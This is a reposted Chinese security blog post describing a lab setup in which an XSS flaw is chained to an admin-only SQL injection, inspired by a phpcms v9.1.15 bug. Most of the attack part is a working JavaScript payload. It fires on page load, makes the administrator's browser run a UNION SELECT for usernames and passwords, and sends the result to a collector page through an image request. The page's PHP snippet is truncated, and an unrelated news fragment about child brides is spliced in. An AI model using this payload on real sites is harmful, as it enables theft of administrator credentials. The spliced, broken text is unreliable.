昨天看见phpcms v9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很多其他的用法!但是,这个注入我没有找到phpcms v9.1.15测试,其他版本都没有测试成功!
于是乎我只有假想下一个极端环境:
1.前台有且只有一个xss漏洞(不能获取管理员cookie)
2.后台有且只有一个sql注入漏洞(注入漏洞文件只有管理员可以访问)
3.注入获得管理员密码可解密
4.除以上无其他任何漏洞(包括后台getwebshell)
其实我就是想说,我们只可以利用这个xss执行注入!
模拟注入漏洞代码
sqli.php
"; echo $row[realname]."
"; ?>
mysql数据库:
database:test table:test、admin column:test.id、test.realname admin.id、admin.username、admin.password
get.php(获取的注入后数据截取)
xsssqli.js(payload)
function addLoadEvent(func)//窗口打开加载多个函数 { var oldfunc=window.onload; //页面打开是加载方法 if(typeof(window.onload)!="function") { window.onload=func; } else { window.onload=function() { oldfunc(); func(); } } } function get_xsssqli() { var url = "http://127.0.0.1/xss/sqli.php?xss=1%20and%201=2%20union%20select%20username,password%20from%20admin"; var ajax = null; if(window.XMLHttpRequest) { ajax = new XMLHttpRequest(); } else if(window.ActiveXObject) { ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本 } else { return; } ajax.open("GET", url, true); ajax.send(null); ajax.onreadystatechange = function() { if(ajax.readyState == 4 && ajax.status == 200) { var img = document.createElement("img"); img.src = "http://127.0.0.1/xss/get.php?get="+ajax.responseText; document.body.appendChild(img); } } } addLoadEvent(get_xsssqli);
模拟xss漏洞
use xss to sqli
最后成功得到数据:
当然你也可以写个正则截获指定数据!
转自:http://lanu.sinaapp.com/htmlcssjisxml/112.html
文章来源于lcx.cc:利用 xss 执行 sql 注入
■5岁的印度女孩拉佳妮在梦中被抱起参加自己的婚礼。 ■也门6岁女孩塔哈妮(粉色裙)嫁给了她身边25岁的马吉德;镜头前方穿绿色裙子的加达曾经是她的同班同学,现在也成了“娃娃新娘”。 《国家地理》揭秘“娃娃新娘”的悲惨命运 新快报讯英国《每日邮报》9日发布…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论